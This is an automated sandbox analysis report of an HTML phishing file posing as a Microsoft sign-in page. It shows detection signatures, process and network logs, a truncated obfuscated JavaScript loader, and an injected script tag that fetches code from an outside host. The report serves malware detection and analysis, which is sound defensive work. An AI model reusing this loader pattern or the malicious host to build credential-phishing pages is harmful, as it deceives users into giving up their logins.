Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
malicious@sample.phishing.file.html

Overview

General Information

Sample Name:malicious@sample.phishing.file.html
Analysis ID:1384103
MD5:b640b59ed75c8f24d4f8233f122062f0
SHA1:34377f62b839937b4cb735d0291588002c36ddc0
SHA256:1aad6b1a019b5dbc94a91e426ef198640f7e6dd9b63b0971ac495e6c52e5e8c2
Infos:

Detection

HTMLPhisher
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish10
Detected javascript redirector / loader
HTML file submission containing password form
HTML sample is only containing javascript code
HTML document with suspicious title
HTML root dynamically written
Call-Chain indicates evasion measures
HTML Script injector detected
Phishing site detected (based on image similarity)
Creates files inside the system directory
Script element or tag injection
None HTTPS page querying sensitive user data (password, username or email)
HTML body contains password input but no form action
HTML title does not match URL

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 4108 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\malicious@sample.phishing.file.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4632 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2312,i,9019154639734182260,6881670019935364994,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

HTML

SourceRuleDescriptionAuthorStrings
0.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security

    Sigma Signatures

    No Sigma rule has matched

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Yara detected HtmlPhish10
    Source: Yara matchFile source: 0.0.pages.csv, type: HTML
    Detected javascript redirector / loader
    Source: malicious@sample.phishing.file.htmlHTTP Parser: Low number of body elements: 0
    HTML sample is only containing javascript code
    Source: malicious@sample.phishing.file.htmlHTTP Parser: <script>var uid= "malicious@sample.phishing"; var _uid=['Jp','dmV','mh','0dH','GV','PC','Bz','aWN','2Fs','Zl','L2p','5jb','zL2','jc3','Jld','I+','yc','9z','WVy','cn','dCB','Oi8','5p','eS','i9','20v','cy','vdW','Q+','cH','lw','5q','PHN','vb','LW','pxd...
    HTML document with suspicious title
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.htmlTab title: Sign in to your account
    HTML root dynamically written
    Source: file\:///C\:/Users/user/Desktop/malicious@sample.phishing.file.htmlJavaScript Tracing: Argument in call to document.write() contains HTML root: "<html lang="en">\x0a <head>\x0a <meta http-equiv="Content-Type" content="text/html; charset=UTF..."
    Call-Chain indicates evasion measures
    Source: file\:///C\:/Users/user/Desktop/malicious@sample.phishing.file.htmlJavaScript Tracing: Detected writing of HTML string to DOM using call to HTMLDocument.write() after method call to atob()
    HTML Script injector detected
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.htmlHTTP Parser: New script tag found
    Phishing site detected (based on image similarity)
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.htmlMatcher: Found strong image similarity, brand: MICROSOFT
    Source: file\:///C\:/Users/user/Desktop/malicious@sample.phishing.file.htmlJavaScript Tracing: HTML-tag "<script>" has been injected into the DOM within a string using HTMLDocument.write("<html lang="en">\x0a <head>\x0a <meta http-equiv="Content-Type" content="text/html; charset=UTF...");
    Source: file\:///C\:/Users/user/Desktop/malicious@sample.phishing.file.htmlJavaScript Tracing: HTML-tag "<script>" has been injected into the DOM within a string using HTMLDocument.write("<script src="https\://universal-ferretera.com/icon/css./js/jquery.js"></script>");
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.htmlHTTP Parser: Has password / email / username input fields
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.htmlHTTP Parser: Title: Sign in to your account does not match URL
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.htmlHTTP Parser: <input type="password" .../> found
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.htmlHTTP Parser: No <meta name="author".. found
    Source: file:///C:/Users/user/Desktop/malicious@sample.phishing.file.htmlHTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 23.209.58.93:443 -> 192.168.2.4:49745 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.209.58.93:443 -> 192.168.2.4:49746 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49751 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49760 version: TLS 1.2
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
    Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
    Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
    Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
    Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
    Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
    Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
    Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
    Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
    Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
    Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
    Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
    Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
    Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
    Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
    Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
    Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
    Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
    Source: unknownTCP traffic detected without corresponding DNS query: 23.209.58.93
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownTCP traffic detected without corresponding DNS query: 40.68.123.157
    Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk
    Source: unknownDNS traffic detected: queries for: accounts.google.com
    Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.132&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.132Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /icon/css./js/jquery.js HTTP/1.1Host: universal-ferretera.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /16.000.28510.6/images/favicon.ico HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /16.000.28510.6/images/favicon.ico HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3zR+716CuA+MVrv&MD=C4TvLgvC HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3zR+716CuA+MVrv&MD=C4TvLgvC HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=0000000000000000000000000000000000000000904777ECD0 HTTP/1.1Host: clients1.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br
    Source: unknownHTTPS traffic detected: 23.209.58.93:443 -> 192.168.2.4:49745 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 23.209.58.93:443 -> 192.168.2.4:49746 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49751 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49760 version: TLS 1.2
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_BITS_4108_705123645Jump to behavior
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\malicious@sample.phishing.file.html
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2312,i,9019154639734182260,6881670019935364994,262144 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2312,i,9019154639734182260,6881670019935364994,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: classification engineClassification label: mal80.phis.evad.winHTML@26/6@12/13

    Stealing of Sensitive Information

    bar